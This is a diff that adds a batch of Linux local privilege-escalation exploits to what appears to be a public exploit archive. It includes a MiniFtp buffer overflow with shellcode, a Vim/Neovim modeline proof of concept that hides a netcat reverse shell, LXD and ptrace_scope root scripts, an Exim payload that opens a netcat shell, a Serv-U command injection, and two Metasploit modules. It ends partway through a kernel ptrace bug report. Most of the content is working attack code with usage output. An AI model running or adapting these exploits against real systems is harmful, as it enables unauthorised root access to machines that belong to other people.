new file mode 100644
index 000000000..79d6b4f85
--- /dev/null
+++ b/exploits/linux/local/46807.txt
@@ -0,0 +1,82 @@
+# Exploit Title: MiniFtp parseconf_load_setting local-bufferoverflow (318 bytes)
+# Google Dork: None
+# Date: 11.04.2019
+# Exploit Author: strider
+# Vendor Homepage: https://github.com/skyqinsc/MiniFtp
+# Software Link: https://github.com/skyqinsc/MiniFtp
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 318
+------------------------------[Description]---------------------------------
+
+This exploit spawns a shell with root privileges. The exploit will be written into the file miniftpd.conf
+
+vuln code:
+void parseconf_load_setting(const char *setting){
+while(isspace(*setting)) setting++;
+	char key[128] = {0}, value[128] = {0};
+	str_split(setting, key, value, '=');
+	if(strlen(value) == 0){
+		fprintf(stderr, "missing value in config file for : %s\n", key);
+		exit(EXIT_FAILURE);
+	}
+....
+
+The given var settings is a *char and will be splitted into key and value key and value are both 128 char long and settings can be longer than 128 + 128 chars. this issue will not be checked and stored. This causes a buffer overflow.
+
+after return it 
+
+-----------------------------[Gdb-Peda Dump]---------------------------------
+[----------------------------------registers-----------------------------------]
+RAX: 0x0 
+RBX: 0x48575250e7894851 
+RCX: 0xffffffd480050f3b 
+RDX: 0x90 
+RSI: 0x7fffffffd3a0 --> 0x9090909090909090 
+RDI: 0x55555555c854 ("download_max_rate")
+RBP: 0x50f3bc08348e689 
+RSP: 0x7fffffffd460 --> 0x555555556860 (<_start>:	xor    ebp,ebp)
+RIP: 0x7fffffffd481 --> 0x9090909090909090 
+R8 : 0xa ('\n')
+R9 : 0x7fffffffd4a0 --> 0x9090909090909090 
+R10: 0x83a 
+R11: 0x7ffff7891520 (<__strcmp_sse2_unaligned>:	mov    eax,edi)
+R12: 0x555555556860 (<_start>:	xor    ebp,ebp)
+R13: 0x7fffffffe200 --> 0x1 
+R14: 0x0 
+R15: 0x0
+EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+   0x7fffffffd478:	imul   esi,DWORD PTR [rax+0x3d],0x90909090
+   0x7fffffffd47f:	nop
+   0x7fffffffd480:	nop
+=> 0x7fffffffd481:	nop
+   0x7fffffffd482:	nop
+   0x7fffffffd483:	nop
+   0x7fffffffd484:	nop
+   0x7fffffffd485:	nop
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffffd460 --> 0x555555556860 (<_start>:	xor    ebp,ebp)
+0008| 0x7fffffffd468 --> 0x55555555b5b2 ("miniftpd.conf")
+0016| 0x7fffffffd470 ("max_per_ip=", '\220' <repeats 189 times>...)
+0024| 0x7fffffffd478 --> 0x90909090903d7069 
+0032| 0x7fffffffd480 --> 0x9090909090909090 
+0040| 0x7fffffffd488 --> 0x9090909090909090 
+0048| 0x7fffffffd490 --> 0x9090909090909090 
+0056| 0x7fffffffd498 --> 0x9090909090909090 
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+0x00007fffffffd481 in ?? ()
+gdb-peda$ 
+
+
+ -----------------------------[Exploit]---------------------------------------------
+
+python -c "print 'max_per_ip=' + '\x90' * 278 + '\x48\x31\xc0\x48\x31\xd2\x50\x49\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x51\x48\x89\xe7\x50\x52\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05' + '\x80\xd4\xff\xff\xff\x7f'" > miniftpd.conf
+
+
+ -----------------------------[how to run]-----------------------------
+
+run the line above in a shell
+
+run MiniFtp in gdb and you got a shell
\ No newline at end of file
diff --git a/exploits/linux/local/46973.md b/exploits/linux/local/46973.md
new file mode 100644
index 000000000..cc33d9ae1
--- /dev/null
+++ b/exploits/linux/local/46973.md
@@ -0,0 +1,142 @@
+*by Arminius ([@rawsec](https://twitter.com/rawsec))*
+
+Vim/Neovim Arbitrary Code Execution via Modelines
+=================================================
+
+```
+Product: Vim < 8.1.1365, Neovim < 0.3.6
+Type:    Arbitrary Code Execution
+CVE:     CVE-2019-12735
+Date:    2019-06-04
+Author:  Arminius (@rawsec)
+```
+
+Summary
+-------
+
+Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code
+execution via modelines by opening a specially crafted text file.
+
+
+Proof of concept
+----------------
+
+- Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt):
+
+      :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
+
+- Ensure that the modeline option has not been disabled (`:set modeline`).
+
+- Open the file in Vim:
+
+      $ vim poc.txt
+
+- The system will execute `uname -a`.
+
+Proof of concept 2 (reverse shell)
+----------------------------------
+
+This PoC outlines a real-life attack approach in which a reverse shell
+is launched once the user opens the file. To conceal the attack, the file will
+be immediately rewritten when opened. Also, the PoC uses terminal escape
+sequences to hide the modeline when the content is printed with `cat`. (`cat
+-v` reveals the actual content.)
+
+[`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt):
+
+    \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
+
+Demo (victim left, attacker right):
+
+![Reverse shell demo](https://i.imgur.com/8w4tteX.gif)
+
+Details
+-------
+
+The modeline feature allows to specify custom editor options near the start or
+end of a file. This feature is enabled by default and applied to all file types,
+including plain `.txt`. A typical modeline:
+
+    /* vim: set textwidth=80 tabstop=8: */
+
+For security reasons, only a subset of options is permitted in modelines, and
+if the option value contains an expression, it is executed in a sandbox: [[1]]
+
+    No other commands than "set" are supported, for security reasons (somebody
+    might create a Trojan horse text file with modelines).  And not all options
+    can be set.  For some options a flag is set, so that when it's used the
+    |sandbox| is effective.
+
+The sandbox is meant to prevent side effects: [[2]]
+
+    The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and
+    'foldtext' options may be evaluated in a sandbox.  This means that you are
+    protected from these expressions having nasty side effects.  This gives some
+    safety for when these options are set from a modeline.
+
+However, the `:source!` command (with the bang [`!`] modifier) can be used to
+bypass the sandbox. It reads and executes commands from a given file as if
+*typed manually*, running them after the sandbox has been left. [[3]]
+
+    :so[urce]! {file}       Read Vim commands from {file}.  These are commands
+                            that are executed from Normal mode, like you type
+                            them.
+
+Thus, one can trivially construct a modeline that runs code outside the sandbox:
+
+    # vim: set foldexpr=execute('\:source! some_file'):
+
+An additional step is needed for Neovim which blacklists `execute()`: [[4]]
+
+    execute({command} [, {silent}])                         *execute()*
+                    Execute {command} and capture its output.
+                    [...]
+                    This function is not available in the |sandbox|.
+
+Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]]
+
+    assert_fails({cmd} [, {error} [, {msg}]])               *assert_fails()*
+                    Run {cmd} and add an error message to |v:errors| if it does
+                    NOT produce an error.
+
+The following modeline utilizes a fold expression to run `source!  %` to
+execute the current file, which in turn executes `uname -a || "(garbage)"` as a
+shell command:
+
+    :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
+
+Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same
+approach via e.g.:
+
+     vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0
+
+(In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).)
+
+Patches
+-------
+
+- [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552)
+- [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6))
+
+Beyond patching, it's recommended to disable modelines in the vimrc (`set
+nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/)
+plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow
+expressions in modelines.
+
+Timeline
+--------
+
+    - 2019-05-22 Vim and Neovim maintainers notified
+    - 2019-05-23 Vim patch released
+    - 2019-05-29 Neovim patch released
+    - 2019-06-05 CVE ID CVE-2019-12735 assigned
+
+Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735).
+
+[1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582
+[2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050
+[3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182
+[4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247
+[5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494
+[6]: https://github.com/vim/vim/releases/tag/v8.1.1365
+[7]: https://github.com/neovim/neovim/releases/tag/v0.3.6
\ No newline at end of file
diff --git a/exploits/linux/local/46978.sh b/exploits/linux/local/46978.sh
new file mode 100755
index 000000000..a3c2414bc
--- /dev/null
+++ b/exploits/linux/local/46978.sh
@@ -0,0 +1,50 @@
+#!/usr/bin/env bash
+
+# ----------------------------------
+# Authors: Marcelo Vazquez (S4vitar)
+#	   Victor Lasa      (vowkin)
+# ----------------------------------
+
+# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
+# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
+# Step 3: Run this script and you will get root [Victim Machine]
+# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
+
+function helpPanel(){
+  echo -e "\nUsage:"
+  echo -e "\t[-f] Filename (.tar.gz alpine file)"
+  echo -e "\t[-h] Show this help panel\n"
+  exit 1
+}
+
+function createContainer(){
+  lxc image import $filename --alias alpine && lxd init --auto
+  echo -e "[*] Listing images...\n" && lxc image list
+  lxc init alpine privesc -c security.privileged=true
+  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
+  lxc start privesc
+  lxc exec privesc sh
+  cleanup
+}
+
+function cleanup(){
+  echo -en "\n[*] Removing container..."
+  lxc stop privesc && lxc delete privesc && lxc image delete alpine
+  echo " [√]"
+}
+
+set -o nounset
+set -o errexit
+
+declare -i parameter_enable=0; while getopts ":f:h:" arg; do
+  case $arg in
+    f) filename=$OPTARG && let parameter_enable+=1;;
+    h) helpPanel;;
+  esac
+done
+
+if [ $parameter_enable -ne 1 ]; then
+  helpPanel
+else
+  createContainer
+fi
\ No newline at end of file
diff --git a/exploits/linux/local/46989.sh b/exploits/linux/local/46989.sh
new file mode 100755
index 000000000..cd5d8f395
--- /dev/null
+++ b/exploits/linux/local/46989.sh
@@ -0,0 +1,96 @@
+#!/usr/bin/env bash
+
+#######################################################
+#                                                     #
+#           'ptrace_scope' misconfiguration           #
+#              Local Privilege Escalation             #
+#                                                     #
+#######################################################
+
+# Affected operating systems (TESTED):
+# 	Parrot Home/Workstation    4.6 (Latest Version)
+#       Parrot Security            4.6 (Latest Version)
+#	CentOS / RedHat            7.6 (Latest Version)
+#	Kali Linux              2018.4 (Latest Version)
+
+# Authors: Marcelo Vazquez  (s4vitar)
+# 	   Victor Lasa       (vowkin)
+
+#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
+#└──╼ $./exploit.sh
+#
+#[*] Checking if 'ptrace_scope' is set to 0... [√]
+#[*] Checking if 'GDB' is installed...         [√]
+#[*] System seems vulnerable!                  [√]
+#
+#[*] Starting attack...
+#[*] PID -> sh
+#[*] Path 824: /home/s4vitar
+#[*] PID -> bash
+#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> bash
+#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
+#[*] PID -> bash
+#[*] Path 1842: /home/s4vitar
+#[*] PID -> bash
+#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
+#[*] PID -> bash
+#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
+#
+#[*] Cleaning up...                            [√]
+#[*] Spawning root shell...                    [√]
+#
+#bash-4.4# whoami
+#root
+#bash-4.4# id
+#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
+#bash-4.4#
+
+
+function startAttack(){
+  tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
+    if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
+      echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
+      echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
+    fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
+    done
+
+    if [ -f /tmp/bash ]; then
+      /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
+                       rm /tmp/bash
+                       echo -e "                            [√]"
+                       echo -ne "[*] Spawning root shell..."
+                       echo -e "                    [√]\n"
+                       tput cnorm && bash -p'
+    else
+      echo -e "\n[*] Could not copy SUID to /tmp/bash          [✗]"
+    fi
+}
+
+echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
+if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
+  echo " [√]"
+  echo -ne "[*] Checking if 'GDB' is installed..."
+  if command -v gdb >/dev/null 2>&1; then
+    echo -e "         [√]"
+    echo -e "[*] System seems vulnerable!                  [√]\n"
+    echo -e "[*] Starting attack..."
+
+    startAttack
+
+  else
+    echo "         [✗]"
+    echo "[*] System is NOT vulnerable :(               [✗]"
+  fi
+else
+  echo " [✗]"
+  echo "[*] System is NOT vulnerable :(               [✗]"
+fi; tput cnorm
\ No newline at end of file
diff --git a/exploits/linux/local/46996.sh b/exploits/linux/local/46996.sh
new file mode 100755
index 000000000..5da8e3111
--- /dev/null
+++ b/exploits/linux/local/46996.sh
@@ -0,0 +1,151 @@
+#!/bin/bash
+
+#
+# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
+# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
+# Improper validation of recipient address in deliver_message() 
+# function in /src/deliver.c may lead to remote command execution.
+# (CVE-2019-10149)
+#
+# This is a local privilege escalation exploit for "The Return 
+# of the WIZard" vulnerability reported by the Qualys Security 
+# Advisory team.
+#
+# Credits:
+# Qualys Security Advisory team (kudos for your amazing research!)
+# Dennis 'dhn' Herrmann (/dev/tcp technique)
+#
+# Usage (setuid method):
+# $ id
+# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
+# $ ./raptor_exim_wiz -m setuid
+# Preparing setuid shell helper...
+# Delivering setuid payload...
+# [...]
+# Waiting 5 seconds...
+# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
+# # id
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# Usage (netcat method):
+# $ id
+# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
+# $ ./raptor_exim_wiz -m netcat
+# Delivering netcat payload...
+# Waiting 5 seconds...
+# localhost [127.0.0.1] 31337 (?) open
+# id
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# Vulnerable platforms:
+# Exim 4.87 - 4.91
+#
+# Tested against:
+# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
+#
+
+METHOD="setuid" # default method
+PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
+PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
+
+# usage instructions
+function usage()
+{
+	echo "$0 [-m METHOD]"
+	echo
+	echo "-m setuid : use the setuid payload (default)"
+	echo "-m netcat : use the netcat payload"
+	echo
+	exit 1
+}
+
+# payload delivery
+function exploit()
+{
+	# connect to localhost:25
+	exec 3<>/dev/tcp/localhost/25
+
+	# deliver the payload
+	read -u 3 && echo $REPLY
+	echo "helo localhost" >&3
+	read -u 3 && echo $REPLY
+	echo "mail from:<>" >&3
+	read -u 3 && echo $REPLY
+	echo "rcpt to:<$PAYLOAD>" >&3
+	read -u 3 && echo $REPLY
+	echo "data" >&3
+	read -u 3 && echo $REPLY
+	for i in {1..31}
+	do
+		echo "Received: $i" >&3
+	done
+	echo "." >&3
+	read -u 3 && echo $REPLY
+	echo "quit" >&3
+	read -u 3 && echo $REPLY
+}
+
+# print banner
+echo
+echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
+echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
+echo
+
+# parse command line
+while [ ! -z "$1" ]; do
+	case $1 in
+		-m) shift; METHOD="$1"; shift;;
+		* ) usage
+		;;
+	esac
+done
+if [ -z $METHOD ]; then
+	usage
+fi
+
+# setuid method
+if [ $METHOD = "setuid" ]; then
+
+	# prepare a setuid shell helper to circumvent bash checks
+	echo "Preparing setuid shell helper..."
+	echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
+	gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
+	if [ $? -ne 0 ]; then
+		echo "Problems compiling setuid shell helper, check your gcc."
+		echo "Falling back to the /bin/sh method."
+		cp /bin/sh /tmp/pwned
+	fi
+	echo
+
+	# select and deliver the payload
+	echo "Delivering $METHOD payload..."
+	PAYLOAD=$PAYLOAD_SETUID
+	exploit
+	echo
+
+	# wait for the magic to happen and spawn our shell
+	echo "Waiting 5 seconds..."
+	sleep 5
+	ls -l /tmp/pwned
+	/tmp/pwned
+
+# netcat method
+elif [ $METHOD = "netcat" ]; then
+
+	# select and deliver the payload
+	echo "Delivering $METHOD payload..."
+	PAYLOAD=$PAYLOAD_NETCAT
+	exploit
+	echo
+
+	# wait for the magic to happen and spawn our shell
+	echo "Waiting 5 seconds..."
+	sleep 5
+	nc -v 127.0.0.1 31337
+
+# print help
+else
+	usage
+fi
\ No newline at end of file
diff --git a/exploits/linux/local/47009.c b/exploits/linux/local/47009.c
new file mode 100644
index 000000000..15585a1e9
--- /dev/null
+++ b/exploits/linux/local/47009.c
@@ -0,0 +1,24 @@
+/*
+
+CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 
+
+vulnerability found by:
+Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
+
+to compile and run:
+gcc servu-pe-cve-2019-12181.c -o pe && ./pe
+
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <errno.h>
+
+int main()
+{       
+    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
+    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
+    // if execv is successful, we won't reach here
+    printf("ret val: %d errno: %d\n", ret_val, errno);
+    return errno;
+}
\ No newline at end of file
diff --git a/exploits/linux/local/47017.rb b/exploits/linux/local/47017.rb
new file mode 100755
index 000000000..a491d27f9
--- /dev/null
+++ b/exploits/linux/local/47017.rb
@@ -0,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super( update_info( info,
+      'Name'           => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',
+      'Description'    => %q{
+        This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The
+        runrshell binary is meant to execute a shell script as root, but can be abused to inject
+        extra commands in the argument, allowing you to execute anything as root.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery
+          'sinn3r'                               # Metasploit module
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DisclosureDate' => '2018-12-08',
+      'Privileged'     => true,
+      'References'     =>
+        [
+          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],
+        ],
+      'Targets'        =>
+        [
+          [ 'Cisco Prime Infrastructure 3.4.0', {} ]
+        ],
+      'DefaultTarget'  => 0
+     ))
+
+    register_advanced_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])
+    ]
+  end
+
+  def exec_as_root(cmd)
+    command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'"
+    vprint_status(cmd_exec(command_string))
+  end
+
+  def exploit
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"
+    exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)
+    print_status("Uploading #{exe_path}")
+    write_file(exe_path, generate_payload_exe)
+    unless file?(exe_path)
+      print_error("Failed to upload #{exe_path}")
+      return
+    end
+
+    register_file_for_cleanup(exe_path)
+    print_status('chmod the file with +x')
+    exec_as_root("/bin/chmod +x #{exe_path}")
+    print_status("Executing #{exe_path}")
+    exec_as_root(exe_path)
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47072.rb b/exploits/linux/local/47072.rb
new file mode 100755
index 000000000..a26288eb9
--- /dev/null
+++ b/exploits/linux/local/47072.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Serv-U FTP Server prepareinstallation Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on systems running
+        Serv-U FTP Server versions prior to 15.1.7.
+
+        The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
+        in a call to `system()`, without validation, when invoked with
+        the `-prepareinstallation` flag, resulting in command execution
+        with root privileges.
+
+        This module has been tested successfully on Serv-U FTP Server
+        version 15.1.6 (x64) on Debian 9.6 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Guy Levin', # @va_start - Discovery and exploit
+          'bcoles'     # Metasploit
+        ],
+      'DisclosureDate' => '2019-06-05',
+      'References'     =>
+        [
+          ['CVE', '2019-12181'],
+          ['EDB', '47009'],
+          ['PACKETSTORM', '153333'],
+          ['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
+          ['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
+          ['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
+          ['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
+          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultOptions' =>
+        {
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork'      => true,
+          'WfsDelay'         => 30
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def servu_path
+    datastore['SERVU_PATH']
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def check
+    unless command_exists? 'bash'
+      vprint_error 'bash shell is not available'
+      return CheckCode::Safe
+    end
+    vprint_good 'bash shell is available'
+
+    unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
+      vprint_error "#{servu_path} is not executable"
+      return CheckCode::Safe
+    end
+    vprint_good "#{servu_path} is executable"
+
+    unless setuid? servu_path
+      vprint_error "#{servu_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{servu_path} is setuid"
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    if nosuid? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 10..15}"
+    @payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx @payload_path, generate_payload_exe
+
+    argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
+    cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
+    vprint_status "Executing command: #{cmd}"
+    cmd_exec cmd
+
+    unless setuid? @payload_path
+      fail_with Failure::Unknown, 'Failed to set payload setuid root'
+    end
+    print_good "#{@payload_path} setuid root successfully"
+
+    print_status 'Executing payload...'
+    res = cmd_exec "#{@payload_path} &"
+    vprint_line res
+  end
+
+  def on_new_session(session)
+    if session.type.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.fs.file.rm @payload_path
+    else
+      session.shell_command_token "rm -f '#{@payload_path}'"
+    end
+  ensure
+    super
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47133.txt b/exploits/linux/local/47133.txt
new file mode 100644
index 000000000..4af00af9e
--- /dev/null
+++ b/exploits/linux/local/47133.txt
@@ -0,0 +1,196 @@
+== Summary ==
+This bug report describes two issues introduced by commit 64b875f7ac8a ("ptrace:
+Capture the ptracer's creds not PT_PTRACE_CAP", introduced in v4.10 but also
+stable-backported to older versions). I will send a suggested patch in a minute
+("ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME").
+
+When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference
+to the parent's objective credentials, then give that pointer to
+get_cred(). However, the object lifetime rules for things like struct cred
+do not permit unconditionally turning an RCU reference into a stable
+reference.
+
+PTRACE_TRACEME records the parent's credentials as if the parent was acting
+as the subject, but that's not the case. If a malicious unprivileged child
+uses PTRACE_TRACEME and the parent is privileged, and at a later point, the
+parent process becomes attacker-controlled (because it drops privileges and
+calls execve()), the attacker ends up with control over two processes with
+a privileged ptrace relationship, which can be abused to ptrace a suid
+binary and obtain root privileges.
+
+
+== Long bug description ==
+While I was trying to refactor the cred_guard_mutex logic, I stumbled over the
+following issues:
+
+ptrace relationships can be set up in two ways: Either the tracer attaches to
+another process (PTRACE_ATTACH/PTRACE_SEIZE), or the tracee forces its parent to
+attach to it (PTRACE_TRACEME).
+When a tracee goes through a privilege-gaining execve(), the kernel checks
+whether the ptrace relationship is privileged. If it is not, the
+privilege-gaining effect of execve is suppressed.
+The idea here is that a privileged tracer (e.g. if root runs "strace" on
+some process) is allowed to trace through setuid/setcap execution, but an
+unprivileged tracer must not be allowed to do that, since it could otherwise
+inject arbitrary code into privileged processes.
+
+In the PTRACE_ATTACH/PTRACE_SEIZE case, the tracer's credentials are recorded at
+the time it calls PTRACE_ATTACH/PTRACE_SEIZE; later, when the tracee goes
+through execve(), it is checked whether the recorded credentials are capable
+over the tracee's user namespace.
+But in the PTRACE_TRACEME case, the kernel also records _the tracer's_
+credentials, even though the tracer is not requesting the operation. There are
+two problems with that.
+
+
+First, there is an object lifetime issue:
+ptrace_traceme() -> ptrace_link() grabs __task_cred(new_parent) in an RCU
+read-side critical section, then passes the creds to __ptrace_link(), which
+calls get_cred() on them. If the parent concurrently switches its creds (e.g.
+via setresuid()), the creds' refcount may already be zero, in which case
